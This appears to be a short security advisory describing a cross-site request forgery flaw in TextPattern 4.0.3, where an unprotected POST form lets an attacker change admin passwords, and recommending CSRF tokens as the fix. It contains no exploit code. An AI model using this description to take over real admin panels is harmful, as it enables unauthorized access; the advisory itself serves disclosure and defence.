Technical Details & Description:

A Cross Site Request Forgery vulnerability is detected on TextPattern 4.0.3. A not protected POST form request allows an attacker 
to change via required user inter-action application(admin) passwords. When successfully exploited by a auth user/admin account 
the vulnerability can lead to unauthorized access(Admin-Panel).

Solution - Fix & Patch:

Use form tokens to prevent against csrf attacks with  user inter-action. (csrf token)
